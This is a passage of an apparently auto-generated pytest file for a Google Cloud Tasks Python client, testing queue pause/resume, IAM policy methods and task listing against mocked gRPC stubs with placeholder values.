# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_pause_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.pause_queue(
cloudtasks.PauseQueueRequest(), name="name_value",
)
@pytest.mark.parametrize("request_type", [cloudtasks.ResumeQueueRequest, dict,])
def test_resume_queue(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.resume_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue(
name="name_value",
state=queue.Queue.State.RUNNING,
app_engine_http_target=target.AppEngineHttpTarget(
app_engine_routing_override=target.AppEngineRouting(
service="service_value"
)
),
)
response = client.resume_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ResumeQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
def test_resume_queue_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.resume_queue), "__call__") as call:
client.resume_queue()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ResumeQueueRequest()
@pytest.mark.asyncio
async def test_resume_queue_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.ResumeQueueRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.resume_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
queue.Queue(name="name_value", state=queue.Queue.State.RUNNING,)
)
response = await client.resume_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ResumeQueueRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, queue.Queue)
assert response.name == "name_value"
assert response.state == queue.Queue.State.RUNNING
@pytest.mark.asyncio
async def test_resume_queue_async_from_dict():
await test_resume_queue_async(request_type=dict)
def test_resume_queue_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ResumeQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.resume_queue), "__call__") as call:
call.return_value = queue.Queue()
client.resume_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_resume_queue_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ResumeQueueRequest()
request.name = "name/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.resume_queue), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
await client.resume_queue(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "name=name/value",) in kw["metadata"]
def test_resume_queue_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.resume_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.resume_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_resume_queue_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.resume_queue(
cloudtasks.ResumeQueueRequest(), name="name_value",
)
@pytest.mark.asyncio
async def test_resume_queue_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.resume_queue), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = queue.Queue()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(queue.Queue())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.resume_queue(name="name_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_resume_queue_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.resume_queue(
cloudtasks.ResumeQueueRequest(), name="name_value",
)
@pytest.mark.parametrize("request_type", [iam_policy_pb2.GetIamPolicyRequest, dict,])
def test_get_iam_policy(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy(version=774, etag=b"etag_blob",)
response = client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy_pb2.GetIamPolicyRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, policy_pb2.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
def test_get_iam_policy_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
client.get_iam_policy()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy_pb2.GetIamPolicyRequest()
@pytest.mark.asyncio
async def test_get_iam_policy_async(
transport: str = "grpc_asyncio", request_type=iam_policy_pb2.GetIamPolicyRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
policy_pb2.Policy(version=774, etag=b"etag_blob",)
)
response = await client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy_pb2.GetIamPolicyRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, policy_pb2.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
@pytest.mark.asyncio
async def test_get_iam_policy_async_from_dict():
await test_get_iam_policy_async(request_type=dict)
def test_get_iam_policy_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.GetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
call.return_value = policy_pb2.Policy()
client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_iam_policy_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.GetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy_pb2.Policy())
await client.get_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
def test_get_iam_policy_from_dict_foreign():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy()
response = client.get_iam_policy(
request={
"resource": "resource_value",
"options": options_pb2.GetPolicyOptions(requested_policy_version=2598),
}
)
call.assert_called()
def test_get_iam_policy_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_iam_policy(resource="resource_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].resource
mock_val = "resource_value"
assert arg == mock_val
def test_get_iam_policy_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_iam_policy(
iam_policy_pb2.GetIamPolicyRequest(), resource="resource_value",
)
@pytest.mark.asyncio
async def test_get_iam_policy_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy_pb2.Policy())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_iam_policy(resource="resource_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].resource
mock_val = "resource_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_iam_policy_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_iam_policy(
iam_policy_pb2.GetIamPolicyRequest(), resource="resource_value",
)
@pytest.mark.parametrize("request_type", [iam_policy_pb2.SetIamPolicyRequest, dict,])
def test_set_iam_policy(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy(version=774, etag=b"etag_blob",)
response = client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy_pb2.SetIamPolicyRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, policy_pb2.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
def test_set_iam_policy_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
client.set_iam_policy()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy_pb2.SetIamPolicyRequest()
@pytest.mark.asyncio
async def test_set_iam_policy_async(
transport: str = "grpc_asyncio", request_type=iam_policy_pb2.SetIamPolicyRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
policy_pb2.Policy(version=774, etag=b"etag_blob",)
)
response = await client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy_pb2.SetIamPolicyRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, policy_pb2.Policy)
assert response.version == 774
assert response.etag == b"etag_blob"
@pytest.mark.asyncio
async def test_set_iam_policy_async_from_dict():
await test_set_iam_policy_async(request_type=dict)
def test_set_iam_policy_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.SetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
call.return_value = policy_pb2.Policy()
client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_set_iam_policy_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.SetIamPolicyRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy_pb2.Policy())
await client.set_iam_policy(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
def test_set_iam_policy_from_dict_foreign():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy()
response = client.set_iam_policy(
request={
"resource": "resource_value",
"policy": policy_pb2.Policy(version=774),
}
)
call.assert_called()
def test_set_iam_policy_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.set_iam_policy(resource="resource_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].resource
mock_val = "resource_value"
assert arg == mock_val
def test_set_iam_policy_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.set_iam_policy(
iam_policy_pb2.SetIamPolicyRequest(), resource="resource_value",
)
@pytest.mark.asyncio
async def test_set_iam_policy_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.set_iam_policy), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = policy_pb2.Policy()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(policy_pb2.Policy())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.set_iam_policy(resource="resource_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].resource
mock_val = "resource_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_set_iam_policy_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.set_iam_policy(
iam_policy_pb2.SetIamPolicyRequest(), resource="resource_value",
)
@pytest.mark.parametrize(
"request_type", [iam_policy_pb2.TestIamPermissionsRequest, dict,]
)
def test_test_iam_permissions(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = iam_policy_pb2.TestIamPermissionsResponse(
permissions=["permissions_value"],
)
response = client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy_pb2.TestIamPermissionsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, iam_policy_pb2.TestIamPermissionsResponse)
assert response.permissions == ["permissions_value"]
def test_test_iam_permissions_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
client.test_iam_permissions()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy_pb2.TestIamPermissionsRequest()
@pytest.mark.asyncio
async def test_test_iam_permissions_async(
transport: str = "grpc_asyncio",
request_type=iam_policy_pb2.TestIamPermissionsRequest,
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
iam_policy_pb2.TestIamPermissionsResponse(
permissions=["permissions_value"],
)
)
response = await client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == iam_policy_pb2.TestIamPermissionsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, iam_policy_pb2.TestIamPermissionsResponse)
assert response.permissions == ["permissions_value"]
@pytest.mark.asyncio
async def test_test_iam_permissions_async_from_dict():
await test_test_iam_permissions_async(request_type=dict)
def test_test_iam_permissions_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.TestIamPermissionsRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
call.return_value = iam_policy_pb2.TestIamPermissionsResponse()
client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_test_iam_permissions_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = iam_policy_pb2.TestIamPermissionsRequest()
request.resource = "resource/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
iam_policy_pb2.TestIamPermissionsResponse()
)
await client.test_iam_permissions(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "resource=resource/value",) in kw["metadata"]
def test_test_iam_permissions_from_dict_foreign():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = iam_policy_pb2.TestIamPermissionsResponse()
response = client.test_iam_permissions(
request={
"resource": "resource_value",
"permissions": ["permissions_value"],
}
)
call.assert_called()
def test_test_iam_permissions_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = iam_policy_pb2.TestIamPermissionsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.test_iam_permissions(
resource="resource_value", permissions=["permissions_value"],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].resource
mock_val = "resource_value"
assert arg == mock_val
arg = args[0].permissions
mock_val = ["permissions_value"]
assert arg == mock_val
def test_test_iam_permissions_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.test_iam_permissions(
iam_policy_pb2.TestIamPermissionsRequest(),
resource="resource_value",
permissions=["permissions_value"],
)
@pytest.mark.asyncio
async def test_test_iam_permissions_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.test_iam_permissions), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = iam_policy_pb2.TestIamPermissionsResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
iam_policy_pb2.TestIamPermissionsResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.test_iam_permissions(
resource="resource_value", permissions=["permissions_value"],
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].resource
mock_val = "resource_value"
assert arg == mock_val
arg = args[0].permissions
mock_val = ["permissions_value"]
assert arg == mock_val
@pytest.mark.asyncio
async def test_test_iam_permissions_flattened_error_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.test_iam_permissions(
iam_policy_pb2.TestIamPermissionsRequest(),
resource="resource_value",
permissions=["permissions_value"],
)
@pytest.mark.parametrize("request_type", [cloudtasks.ListTasksRequest, dict,])
def test_list_tasks(request_type, transport: str = "grpc"):
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListTasksResponse(
next_page_token="next_page_token_value",
)
response = client.list_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ListTasksRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListTasksPager)
assert response.next_page_token == "next_page_token_value"
def test_list_tasks_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = CloudTasksClient(
credentials=ga_credentials.AnonymousCredentials(), transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_tasks), "__call__") as call:
client.list_tasks()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ListTasksRequest()
@pytest.mark.asyncio
async def test_list_tasks_async(
transport: str = "grpc_asyncio", request_type=cloudtasks.ListTasksRequest
):
client = CloudTasksAsyncClient(
credentials=ga_credentials.AnonymousCredentials(), transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListTasksResponse(next_page_token="next_page_token_value",)
)
response = await client.list_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == cloudtasks.ListTasksRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListTasksAsyncPager)
assert response.next_page_token == "next_page_token_value"
@pytest.mark.asyncio
async def test_list_tasks_async_from_dict():
await test_list_tasks_async(request_type=dict)
def test_list_tasks_field_headers():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ListTasksRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_tasks), "__call__") as call:
call.return_value = cloudtasks.ListTasksResponse()
client.list_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_tasks_field_headers_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = cloudtasks.ListTasksRequest()
request.parent = "parent/value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_tasks), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
cloudtasks.ListTasksResponse()
)
await client.list_tasks(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert ("x-goog-request-params", "parent=parent/value",) in kw["metadata"]
def test_list_tasks_flattened():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListTasksResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_tasks(parent="parent_value",)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_list_tasks_flattened_error():
client = CloudTasksClient(credentials=ga_credentials.AnonymousCredentials(),)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_tasks(
cloudtasks.ListTasksRequest(), parent="parent_value",
)
@pytest.mark.asyncio
async def test_list_tasks_flattened_async():
client = CloudTasksAsyncClient(credentials=ga_credentials.AnonymousCredentials(),)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_tasks), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = cloudtasks.ListTasksResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
